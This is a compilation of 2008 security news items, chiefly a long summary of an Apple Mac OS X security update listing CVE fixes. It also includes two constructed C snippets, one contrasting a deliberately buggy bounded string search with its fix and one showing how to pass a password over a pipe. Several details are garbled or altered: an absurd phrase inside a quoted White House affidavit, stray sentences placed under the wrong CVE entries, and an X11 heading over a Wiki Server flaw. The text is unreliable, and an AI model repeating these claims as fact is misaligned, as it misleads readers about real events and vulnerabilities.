US Magistrate Judge John Facciola had last week ordered the administration to show just cause why it should not be required to produce copies of computer hard drives in response to lawsuits filed by citizen watchdog groups.

In a sworn affidavit filed just before the deadline, Theresa Payton, CIO of the White House Office of Administration, may have said: "When workstations are at the end of their lifecycle and retired... under the refresh program, the hard drives are generally sent offsite to another government entity for the forced imposition of democracy or physical destruction, whichever occurs first."

In another filing, the White House claimed that "the allegation of missing e-mail from archives is unconfirmed,... the allegation of missing e-mails from backup tapes is conjectural", and even if some older computers were still in use, finding them and copying their hard drives would "impose a significant burden."

This is just the latest development in a long saga stretching back at least five years. Harpers has a brief take on it here, noting that most of the US media is conveniently burying the story.


Independent antivirus test labs join forces

On Tuesday, Anti-Malware Test Lab and AV-Comparatives.org announced an alliance aimed at becoming one of the most respected sources of objective and independent information about antivirus products. Together they intend to create a unique system of integrated tests for determining the effectiveness of commercial antivirus software by the end of 2008.

Andrea Clementi, founder of AV-Comparatives, said in a statement that "the partnership with Anti-Malware Test Lab will allow us to evaluate more aspects of antivirus software and to offer users a more comprehensive independent view of various security products."

Clementi further hinted that if this alliance works out, there may be additional alliances of independent antivirus software-testing labs.

"I'm sure that our partnership will act as a driving force for the development of the industry as a whole," said Sergey Ilyin, founder of Anti-Malware Test Lab. Anti-Malware Test Lab is an independent Russian test laboratory, a subsidiary of Anti-Malware.ru. The laboratory is best known for testing active infection treatments, antivirus heuristics, and anti-rootkit protection.

This is the second partnership of antivirus-testing organizations in recent months. In January, various antivirus vendors and media outlets gathered in Spain to discuss creating an antivirus test standards group. That group includes F-Secure, Kaspersky Lab, McAfee, Panda Software, and Symantec, according to Andreas Marx, managing director of AV-Test.org.


American tech spy gets 24 years in cooler

The war against tech espionage in America continues, with a US beak sentencing 66-year-old Chinese-American Chi Mak to 24 years in jail.

According to an AFP report, District Judge Cormac Carney said yesterday that his tough sentence would "provide a strong deterrent to the People's Republic of China not to send its agents here to steal American military secrets".

Mak, a longtime US citizen and resident originally hailing from Guangzhou, was found guilty last May of conspiracy to violate export regulations and of failing to register as a Chinese importing agent after a six-week trial. He was not charged with espionage, according to prosecutors, because none of the information he lifted was actually classified. However, the feds successfully contended that the data was of military value and that Mak had committed crimes in passing it to the People's Republic.

"We will never know the full extent of the damage that Mr Mak has done to our national security," wrote Carney in his sentencing statement.

The main information said to have been stolen related to "Quiet Electric Drive" technology developed for US submarines by Mak's employer Power Paragon. Chi Mak's brother Tai found himself wearing a pair of federal bracelets when he tried to fly to the People's Republic with a diskful of silent-sub knowhow in 2005. Another Mak relative, Gu Wei Hao, was said to have rashly tried to recruit an undercover fed to act as go-between in an attempt to blag Space Shuttle blueprints.

Greg Chung, the 72-year-old longtime US citizen who was supposed to have furnished Gu with the spaceship secrets and other valuable intel, was finally arrested in February. He could face up to 150 years in prison if convicted on all charges.


McAfee steps up online safety education drive

To help educate internet users about the potential dangers of the online world, security firm McAfee has created a free 10-step internet safety plan.

Available through the McAfee Advice Center, the ebook is broken into separate sections each aimed at providing safety guidelines for various age groups and experience levels, including kids, teens, parents, teachers and community groups.

In conjunction with the guidelines, there is also a quiz that challenges teens' knowledge of online risks and their ability to stay safe from spyware, spam, scams and identity theft.

"The days when people went online only to gather information and send email have changed," said Todd Gebhart, senior vice president and general manager of Consumer, Mobile and Small Business for McAfee.

"Cyberspace is an exciting environment full of opportunity, but it is also increasingly risky, with numerous threats emerging daily. Parents need to be on guard whenever their children venture online, so we've developed some simple steps to help ensure that young people's online experiences are safe and pleasant."

According to recent research, teens and kids are known to engage in risky online behaviour. For example, while 51 per cent of teens have downloaded music, the search term 'digital music' often leads to drive-by download sites that can populate a computer with spyware, viruses and exploits without users' knowledge. In addition, 45 per cent of young people said someone they've never met in person has asked them for personal information online.

The guidelines also include a section on how to save chat session logs, block users and report intruders, and provide recommendations for age-appropriate browsers and search engines, among other tips.

McAfee hopes that its new ebook will help families work together to set boundaries and create a list of rules to follow.


Apple releases massive security update

Apple on Tuesday released its second security update of the year--and it's a big one.

Known as APPLE-SA-2008-03-18 Security Update 2008-002, it contains more than 40 specific fixes for versions of Mac OS X. The most significant updates include Apache, ClamAV, Emacs, OpenSSH, PHP, and X11. To get the update, go to the Software Update pane in System Preferences, or Apple's Software Downloads Web site. The update "is recommended for all users and improves the security of Mac OS X," according to the Apple Downloads page.

Also on Tuesday, Apple released version 3.1 of its Safari browser for both Mac and Windows users. The release includes new features as well as security fixes, most of which address cross-site scripting flaws.

AFP Client--afp:// URL
This patch only affects users of Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.2, Mac OS X Server v10.5.2. The update addresses an afp:// URL vulnerability in CVE-2007-4680. A remote attacker may be able to cause a certificate to appear trusted. According to Apple, "multiple stack buffer overflow issues exist in AFP Client's handling of afp:// URLs. By enticing a user to connect to a malicious AFP Server, an attacker may cause an unexpected application termination or arbitrary code execution."

AFP Server--Cross-realm authentication
This patch affects users of Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.2, Mac OS X Server v10.5.2. The update addresses a cross-realm authentication vulnerability in CVE-2008-0045. Apple says: "An implementation issue exists in AFP Server's check of Kerberos principal realm names. This may allow unauthorized connections to the server, when cross-realm authentication with AFP Server is used. This update addresses the issue through improved checks of Kerberos principal realm names. This issue does not affect systems running Mac OS X v10.5 or later." Apple also says that this issue has been addressed within Mac OS X v10.5 or later. Apple credits Ragnar Sundblad of KTH - Royal Institute of Technology, Stockholm, Sweden for reporting this issue.

Apache--1
This patch affects users of Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X Server v10.5.2. The update addresses Apache 1.3.33 and 1.3.39 vulnerabilities in CVE-2005-3352, CVE-2006-3747, CVE-2007-3847, CVE-2007-5000, CVE-2007-6388. Apple says "Apache is updated to version 1.3.41 to address several vulnerabilities, the most serious of which may lead to arbitrary code execution. Further information is available via the Apache web site at http://httpd.apache.org. For Mac OS X v10.5, Apache version 1.3.x is only shipped on Server configurations. mod_ssl is also updated from version 2.8.24 to 2.8.31 to match the upgraded Apache; no security fixes are included in the update."

Apache--2
This patch only affects users of Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X Server v10.5.2 and addresses various Apache 2.2.6 vulnerabilities in CVE-2007-5000, CVE-2007-6203, CVE-2007-6388, CVE-2007-6421, CVE-2008-0005. Apple says "Apache is updated to version 2.2.8 to address several vulnerabilities, the most serious of which may lead to cross-site scripting."

AppKit--NSDocument API
This patch affects users of Mac OS X v10.4.11, Mac OS X Server v10.4.11. The update addresses an NSDocument API vulnerability in CVE-2008-0048. Apple says "A stack buffer overflow exists in the NSDocument API's handling of file names. On most file systems, this issue is not exploitable. This update addresses the issue through improved bounds checking. This issue does not affect systems running Mac OS X v10.5 or later."

AppKit--NSApplication
This patch affects users of Mac OS X v10.4.11, Mac OS X Server v10.4.11. The update addresses an NSApplication vulnerability in CVE-2008-0049. Apple says "By sending maliciously crafted messages to privileged applications in the same bootstrap namespace, a local user may cause arbitrary code execution with the privileges of the target application. This update addresses the issue by removing the mach port in question and using another method to synchronize. This issue does not affect systems running Mac OS X v10.5 or later."

AppKit--Multiple integer overflow
This patch affects users of Mac OS X v10.4.11, Mac OS X Server v10.4.11. The update addresses multiple integer overflow vulnerabilities in CVE-2008-0057. Apple says "By causing a maliciously formatted serialized property list to be parsed, an attacker could trigger a heap-based buffer overflow which may lead to arbitrary code execution. This update addresses the issue by performing additional validation of serialized input. This issue does not affect systems running Mac OS X v10.5 or later."

AppKit--network printer
This patch affects users of Mac OS X v10.4.11, Mac OS X Server v10.4.11. The update addresses a vulnerability in CVE-2008-0997. Apple says "by enticing a user to query a network printer, an attacker may cause an unexpected application termination or arbitrary code execution. This update addresses the issue through improved handling of PPD files. This issue does not affect systems running Mac OS X v10.5 or later."

Application Firewall (German)
This patch affects users of Mac OS X v10.4.11, Mac OS X v10.5.2. The update addresses a vulnerability in CVE-2008-0046. Apple says "the 'Set access for specific services and applications' radio button of the Application Firewall preference pane was translated into German as 'Zugriff auf bestimmte Dienste und Programme festlegen', which is 'Set access to specific services and applications'. This might lead a user to believe that the listed services were the only ones that would be permitted to accept incoming connections. This update addresses the issue by changing the German text to semantically match the English text. This issue does not affect systems prior to Mac OS X v10.5."

CFNetwork
This patch affects users of Mac OS X v10.4.11, Mac OS X v10.5.2 and addresses the frame navigation policy vulnerability in CVE-2008-0050. Apple says "a malicious HTTPS proxy server may return arbitrary data to CFNetwork in a 502 Bad Gateway error. A malicious proxy server could use this to spoof secure websites. This update addresses the issue by returning an error on any proxy error, instead of returning the proxy-supplied data. This issue is already addressed in systems running Mac OS X v10.5.2."

ClamAV--1
This patch affects users of Mac OS X Server v10.5.2. The update addresses vulnerabilities in CVE-2007-3725, CVE-2007-4510, CVE-2007-4560, CVE-2007-5759, CVE-2007-6335, CVE-2007-6336, CVE-2007-6337, CVE-2008-0318, CVE-2008-0728. Apple says "multiple vulnerabilities exist in ClamAV 0.90.3 provided with Mac OS X Server v10.5 systems, the most serious of which may lead to arbitrary code execution. This update addresses the issue by updating to ClamAV 0.92.1."

ClamAV--2
This patch affects users of Mac OS X Server v10.4.11. The update addresses vulnerabilities in CVE-2006-6481, CVE-2007-1745, CVE-2007-1997, CVE-2007-3725, CVE-2007-4510, CVE-2007-4560, CVE-2007-0897, CVE-2007-0898, CVE-2008-0318, CVE-2008-0728. Apple says "multiple vulnerabilities exist in ClamAV 0.88.5 provided with Mac OS X Server v10.4.11, the most serious of which may lead to arbitrary code execution. This update addresses the issue by updating to ClamAV 0.92.1."

CoreServices
This patch affects users of Mac OS X v10.4.11, Mac OS X Server v10.4.11. The update addresses the vulnerability in CVE-2008-0052. Apple says: "Files with names ending in ".ief" can be automatically opened in AppleWorks if Safari's "Open 'Safe' files" preference is enabled. This is not the intended behavior and could lead to security policy violations. This update addresses the issue by removing ".ief" from the list of safe file types. This issue only affects systems prior to Mac OS X v10.5 with AppleWorks installed."

CUPS
This patch affects users of Mac OS X v10.4.11, Mac OS X Server v10.4.11. The update addresses a vulnerability in CVE-2008-0596. Apple says "by sending a large number of requests to add and remove shared printers, an attacker may be able to cause a denial of service. This issue cannot result in arbitrary code execution. This update addresses the issue through improved memory management. This issue does not affect systems prior to Mac OS X v10.5."

CUPS
This patch only affects users of Mac OS X v10.5.2, Mac OS X Server v10.5.2. The update addresses a vulnerability in CVE-2008-0047. According to Apple, "a heap buffer overflow exists in the CUPS interface's processing of search expressions. If printer sharing is enabled, a remote attacker may be able to cause an unexpected application termination or arbitrary code execution with system privileges. If printer sharing is not enabled, a local user may be able to gain system privileges. This update addresses the issue by performing additional bounds checking. This issue does not affect systems prior to Mac OS X v10.5." Apple credits regenrecht, working with the VeriSign iDefense VCP, for reporting this vulnerability.

CUPS
This patch affects users of Mac OS X v10.5.2, Mac OS X Server v10.5.2. The update addresses vulnerabilities in CVE-2008-0053 and CVE-2008-0882. Apple says "multiple input validation issues exist in CUPS, the most serious of which may lead to arbitrary code execution with system privileges. This update addresses the issues by updating to CUPS 1.3.6. These issues do not affect systems prior to Mac OS X v10.5."

curl
This patch only affects users of Mac OS X v10.4.11, Mac OS X Server v10.4.11 and addresses a vulnerability in CVE-2005-4077. Apple says "A one-byte buffer overflow exists in curl 7.13.1. By enticing a user to run curl with a maliciously crafted URL, an attacker may cause an unexpected application termination or arbitrary code execution. This update addresses the issue by updating curl to version 7.16.3. Crash Reporter was updated to match the curl changes. This issue does not affect systems running Mac OS X v10.5 or later."

Emacs
This patch affects users of Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.2, Mac OS X Server v10.5.2. The update addresses a format string vulnerability in CVE-2007-6109. Apple says "A stack buffer overflow exists in Emacs' format function. By exploiting vulnerable Emacs Lisp which allows an attacker to provide a format string containing a large precision value, an attacker may cause an unexpected application termination or possibly arbitrary code execution."

Emacs
This patch affects users of Mac OS X v10.4.11 and Mac OS X v10.5.2. The update addresses a safe mode checks vulnerability in CVE-2007-5795. Apple says "a logic error in Emacs' hack-local-variable function allows any local variable to be set, even if 'enable-local-variables' is set to :safe. By enticing a user to load a file containing a maliciously crafted local variables declaration, a local user may cause an unauthorized modification of Emacs Lisp variables leading to arbitrary code execution. This issue has been fixed through improved :safe mode checks."

file
This patch affects users of Mac OS X v10.4.11, Mac OS X Server v10.4.11. The update addresses a vulnerability in CVE-2008-1004. Affected users may find that requesting to unblock a website leads to information disclosure. Apple says "an integer overflow vulnerability exists in the file command line tool, which may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue through improved bounds checking. This issue does not affect systems running Mac OS X v10.5 or later." Apple credits Colin Percival of FreeBSD for reporting this issue.

Foundation--1
This patch affects users of Mac OS X v10.4.11 and Mac OS X Server v10.4.11. The update addresses an NSSelectorFromString API vulnerability in CVE-2008-0054. Apple says "an input validation issue exists in the NSSelectorFromString API. Passing it a malformed selector name may result in the return of an unexpected selector, which could lead to an unexpected application termination or arbitrary code execution. This update addresses the issue by performing additional validation on the selector name. This issue does not affect systems running Mac OS X v10.5 or later."

Foundation--2
This patch affects users of Mac OS X v10.4.11 and Mac OS X Server v10.4.11. The update addresses the NSFileManager vulnerability in CVE-2008-0055. Apple says "when performing a recursive file copying operation, NSFileManager creates directories as world-writable, and only later restricts the permissions. This creates a race condition during which a local user can manipulate the directory and interfere in subsequent operations. This may lead to a privilege escalation to that of the application using the API. This update addresses the issue by creating directories with restrictive permissions. This issue does not affect systems running Mac OS X v10.5 or later."

Foundation--3
This patch affects users of Mac OS X v10.4.11, Mac OS X v10.5.2 and addresses the NSFileManager API vulnerability in CVE-2008-0056. Apple says "a long pathname with an unexpected structure can expose a stack buffer overflow vulnerability in NSFileManager. Presenting a specially crafted path to a program using NSFileManager could lead to the execution of arbitrary code. This update addresses the issue by ensuring a properly sized destination buffer. This issue does not affect systems running Mac OS X v10.5 or later."

Foundation--4
This patch affects users of Mac OS X v10.4.11 and Mac OS X v10.5.2. The update addresses a vulnerability in CVE-2008-0058. Apple says "a thread race condition exists in NSURLConnection's cache management, which can cause a deallocated object to receive messages. Triggering this issue may lead to a denial of service, or arbitrary code execution with the privileges of Safari or another program using NSURLConnection." Apple credits Daniel Jalkut of Red Sweater Software for reporting this vulnerability.

Foundation--5
This patch affects users of Mac OS X v10.4.11 and Mac OS X Server v10.4.11. The update addresses a race condition vulnerability in CVE-2008-0059. Apple says "A race condition exists in NSXML. By enticing a user to process an XML file in an application which uses NSXML, an attacker may cause an unexpected application termination or arbitrary code execution. This update addresses the issue through improvements to the error handling logic of NSXML. This issue does not affect systems running Mac OS X v10.5 or later."

Help Viewer
This patch affects users of Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.2, and Mac OS X Server v10.5.2. The update addresses the vulnerability in CVE-2008-0060. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution. Apple says "A malicious help:topic_list URL may insert arbitrary HTML or JavaScript into the generated topic list page, which may redirect to a Help Viewer help:runscript link that runs Applescript." Apple credits Brian Mastenbrook for reporting this vulnerability.

Image Raw
This patch affects users of Mac OS X v10.5.2, Mac OS X Server v10.5.2. The update addresses the vulnerability in CVE-2008-0987. Apple says "a stack based buffer overflow exists in the handling of Adobe Digital Negative (DNG) image files. By enticing a user to open a maliciously crafted image file, an attacker may cause an unexpected application termination or arbitrary code execution. This update addresses the issue through improved validation of DNG image files. This issue does not affect systems prior to Mac OS X v10.5." Apple credits Clint Ruoho of Laconic Security for reporting this vulnerability.

Kerberos
This patch affects users of Mac OS X v10.4.11 and Mac OS X v10.5.2. The update addresses CVE-2007-5901, CVE-2007-5971, CVE-2008-0062, and CVE-2008-0063. Apple says "Multiple memory corruption issues exist in MIT Kerberos 5, which may lead to an unexpected application termination or arbitrary code execution with system privileges. CVE-2008-0063 does not affect systems running Mac OS X v10.5 or later. CVE-2007-5901 does not affect systems prior to Mac OS X v10.4."

libc
This patch only affects users of Mac OS X v10.4.11 and Mac OS X Server v10.4.11. The update addresses CVE-2008-0988. A remote attacker may be able to cause a certificate to appear trusted. According to Apple, "An off by one issue exists in Libsystem's strnstr(3) implementation. Applications that use the strnstr API can read one byte beyond the limit specified by the user, which may lead to an unexpected application termination. This update addresses the issue through improved bounds checking. This issue does not affect systems running Mac OS X v10.5 or later." Apple credits Mike Ash of Rogue Amoeba Software for reporting this vulnerability.
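The bounds-check ordering that Apple's note describes is easy to show in miniature. The two bounded substring searches below are an added, constructed illustration of the bug class and its fix (they are not Apple's or Libsystem's code); the `peek` helper records the highest haystack index each version reads so a test can catch the one-byte over-read without invoking undefined behaviour.

```c
#include <stddef.h>
#include <string.h>

/* Records the highest haystack index actually read, so a test can spot
 * an over-read without relying on undefined behaviour. */
static char peek(const char *hay, size_t i, long *hi)
{
    if ((long)i > *hi)
        *hi = (long)i;
    return hay[i];
}

/* Read-then-check ordering: inspects hay[i] before asking whether i is
 * still inside the caller's limit, so it touches hay[slen], one byte past
 * the end. Illustrative reconstruction of the bug class, not Apple's code.
 * Returns the offset of needle in hay[0..slen) or -1 if absent. */
long find_read_first(const char *hay, size_t slen, const char *needle, long *hi)
{
    size_t nlen = strlen(needle);
    *hi = -1;
    if (nlen == 0) return 0;
    for (size_t i = 0;; i++) {
        char sc = peek(hay, i, hi);          /* read first ...            */
        if (sc == '\0' || i >= slen)         /* ... limit checked second  */
            return -1;
        if (sc == needle[0] && nlen <= slen - i &&
            memcmp(hay + i, needle, nlen) == 0)
            return (long)i;
    }
}

/* Check-then-read ordering: the limit is tested before every byte is read,
 * so no index >= slen is ever touched, and the needle comparison is also
 * kept inside the limit by the nlen <= slen - i test. */
long find_check_first(const char *hay, size_t slen, const char *needle, long *hi)
{
    size_t nlen = strlen(needle);
    *hi = -1;
    if (nlen == 0) return 0;
    for (size_t i = 0; i < slen; i++) {      /* limit checked before read */
        char sc = peek(hay, i, hi);
        if (sc == '\0')
            return -1;
        if (sc == needle[0] && nlen <= slen - i &&
            memcmp(hay + i, needle, nlen) == 0)
            return (long)i;
    }
    return -1;
}
```

With haystack "abcX" and a limit of 3, both versions correctly report the needle "X" as absent, but only the read-first version has already looked at index 3.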

mDNSResponder
This patch affects users of Mac OS X v10.5.2 and Mac OS X Server v10.5.2. The update addresses CVE-2008-0989. Apple says "a format string issue exists in mDNSResponderHelper. By setting the local hostname to a maliciously crafted string, a local user could cause a denial of service or arbitrary code execution with the privileges of mDNSResponderHelper. This update addresses the issue by using a static format string. This issue does not affect systems prior to Mac OS X v10.5."

notifyd
This patch only affects users of Mac OS X v10.4.11 and Mac OS X Server v10.4.11 and addresses CVE-2008-0990. Apple says "notifyd accepts Mach port death notifications without verifying that they come from the kernel. If a local user sends fake Mach port death notifications to notifyd, applications that use the notify(3) API to register for notifications may never receive the notifications. This update addresses the issue by only accepting Mach port death notifications from the kernel. This issue does not affect systems running Mac OS X v10.5 or later."

OpenSSH
This patch affects users of Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.2, and Mac OS X Server v10.5.2. The update addresses a vulnerability in CVE-2007-4752. Apple says "OpenSSH forwards a trusted X11 cookie when it cannot create an untrusted one. This may allow a remote attacker to gain elevated privileges. This update addresses the issue by updating OpenSSH to version 4.7."

pax archive utility
This patch affects users of Mac OS X v10.5.2 and Mac OS X Server v10.5.2. The update addresses a vulnerability in CVE-2008-0992. Apple says "the pax command line tool does not check a length in its input before using it as an array index, which may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue by checking the index. This issue does not affect systems prior to Mac OS X v10.5."

PHP
This patch affects users of Mac OS X v10.5.2 and Mac OS X Server v10.5.2. The update addresses CVE-2007-1659, CVE-2007-1660, CVE-2007-1661, CVE-2007-1662, CVE-2007-4766, CVE-2007-4767, CVE-2007-4768, and CVE-2007-4887. Apple says "PHP is updated to version 5.2.5 to address multiple vulnerabilities, the most serious of which may lead to arbitrary code execution."

PHP
This patch affects users of Mac OS X v10.4.11, Mac OS X Server v10.4.11, and Mac OS X Server v10.5.2. The update addresses CVE-2007-3378 and CVE-2007-3799. Apple says "PHP is updated to version 4.4.8 to address multiple vulnerabilities, the most serious of which may lead to arbitrary code execution."

Podcast Producer
This patch affects users of Mac OS X v10.5.2 and Mac OS X Server v10.5.2. The update addresses CVE-2008-0993. Apple says "the Podcast Capture application provides passwords to a subtask through the arguments, potentially exposing the passwords to other local users. This update corrects the issue by providing passwords to the subtask through a pipe. This issue does not affect systems prior to Mac OS X v10.5." Apple credits Maximilian Reiss of Chair for Applied Software Engineering, TUM for reporting this issue.
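The fix Apple describes, handing a secret to a subtask over a pipe instead of on its command line, looks like this in plain POSIX C. This is an added, constructed example of the pattern, not Podcast Producer's code; the parent writes the secret into one pipe and the child reports back over a second pipe how many bytes it received.

```c
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Hands a secret to a child process over a pipe rather than in argv.
 * Constructed illustration of the pattern, not Podcast Producer's code.
 * Anything placed in argv can be read by every local user through ps(1)
 * for as long as the process lives; a pipe is visible only to the two
 * processes holding its ends.
 * Returns the number of secret bytes the child confirms it received, or -1. */
long hand_secret_over_pipe(const char *secret)
{
    int to_child[2], from_child[2];
    if (pipe(to_child) == -1 || pipe(from_child) == -1)
        return -1;
    pid_t pid = fork();
    if (pid == -1)
        return -1;
    if (pid == 0) {                          /* child: the subtask */
        close(to_child[1]);
        close(from_child[0]);
        char buf[256];
        size_t n = 0;
        ssize_t r;
        /* Read until the parent closes its end (EOF) or the buffer is full. */
        while (n < sizeof buf &&
               (r = read(to_child[0], buf + n, sizeof buf - n)) > 0)
            n += (size_t)r;
        /* A real subtask would use buf here; argv never held the secret,
         * so ps shows only the program name and its harmless arguments. */
        (void)write(from_child[1], &n, sizeof n);
        _exit(0);
    }
    close(to_child[0]);                      /* parent keeps the write end */
    close(from_child[1]);
    (void)write(to_child[1], secret, strlen(secret));
    close(to_child[1]);                      /* EOF tells the child it has everything */
    size_t got = 0;
    long result = -1;
    if (read(from_child[0], &got, sizeof got) == (ssize_t)sizeof got)
        result = (long)got;
    close(from_child[0]);
    waitpid(pid, NULL, 0);
    return result;
}
```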

Preview
This patch affects users of Mac OS X v10.5.2 and Mac OS X Server v10.5.2 and addresses the vulnerability in CVE-2008-0994. Apple says "when Preview saves a PDF file with encryption, it uses 40-bit RC4. This encryption algorithm may be broken with significant but readily available computing power. A person with access to the file may apply a brute-force technique to view it. This update enhances the encryption to 128-bit RC4."

Printing
This patch affects users of Mac OS X v10.5.2 and Mac OS X Server v10.5.2. The update addresses CVE-2008-0995. Apple says "Printing to a PDF file and setting an 'open' password uses 40-bit RC4. This encryption algorithm may be broken with significant but readily available computing power. A person with access to the file may apply a brute-force technique to view it. This update enhances the encryption to 128-bit RC4. This issue does not affect systems prior to Mac OS X v10.5."

Printing
This patch affects users of Mac OS X v10.5.2 and Mac OS X Server v10.5.2. The update addresses CVE-2008-0996. Apple says "An information disclosure issue exists in the handling of authenticated print queues. When starting a job on an authenticated print queue, the credentials used for authentication may be saved to disk. This update addresses the issue by removing user credentials from printing presets before saving them to disk. This issue does not affect systems prior to Mac OS X v10.5."

System Configuration
This patch affects users of Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.2, and Mac OS X Server v10.5.2. The update addresses CVE-2008-0998. Apple says "The privileged tool NetCfgTool uses distributed objects to communicate with untrusted client programs on the local machine. By sending a maliciously crafted message, a local user can bypass the authorization step and may cause arbitrary code execution with the privileges of the privileged program."

UDF
This patch affects users of Mac OS X v10.5.2 and Mac OS X Server v10.5.2. The update addresses CVE-2008-0999. Apple says "A null pointer dereference issue exists in the handling of Universal Disc Format (UDF) file systems. By enticing a user to open a maliciously crafted disk image, an attacker may cause an unexpected system shutdown. This update addresses the issue through improved validation of UDF file systems. This issue does not affect systems prior to Mac OS X v10.5." Apple credits Paul Wagland of Redwood Software and Wayne Linder of Iomega for reporting this vulnerability.

X11
This patch affects users of Mac OS X v10.5.2 and Mac OS X Server v10.5.2 and addresses CVE-2008-1000. Apple says "A path traversal issue exists in the Mac OS X v10.5 Server Wiki Server. Attackers with access to edit wiki content may upload files that leverage this issue to place content wherever the wiki server can write, which may lead to arbitrary code execution with the privileges of the wiki server. This update addresses the issue through improved file name handling. This issue does not affect systems prior to Mac OS X v10.5." Apple credits Rodrigo Carvalho, from the Core Security Consulting Services (CSC) team of CORE Security Technologies, for reporting this vulnerability.

X11
This patch affects users of Mac OS X v10.4.11 and Mac OS X Server v10.4.11 and addresses CVE-2007-4568 and CVE-2007-4990. Apple says "multiple vulnerabilities exist in X11 X Font Server (XFS) 1.0.4, the most serious of which may lead to arbitrary code execution. This update addresses the issue by updating to version 1.0.5."

X11
This patch affects users of Mac OS X v10.5.2 and Mac OS X Server v10.5.2 and addresses CVE-2006-3334, CVE-2006-5793, CVE-2007-2445, CVE-2007-5266, CVE-2007-5267, CVE-2007-5268, and CVE-2007-5269. Apple says "The PNG reference library (libpng) is updated to version 1.2.24 to address several vulnerabilities, the most serious of which may lead to a remote denial of service or arbitrary code execution."

X11
This patch affects users of Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.2, and Mac OS X Server v10.5.2 and addresses CVE-2007-5958, CVE-2008-0006, CVE-2007-6427, CVE-2007-6428, and CVE-2007-6429. Apple says "Numerous vulnerabilities in the X11 server allow execution of arbitrary code with the privileges of the user running the X11 server if the attacker can authenticate to the X11 server. This is a security vulnerability only if the X11 server is configured to not require authentication, which Apple does not recommend."
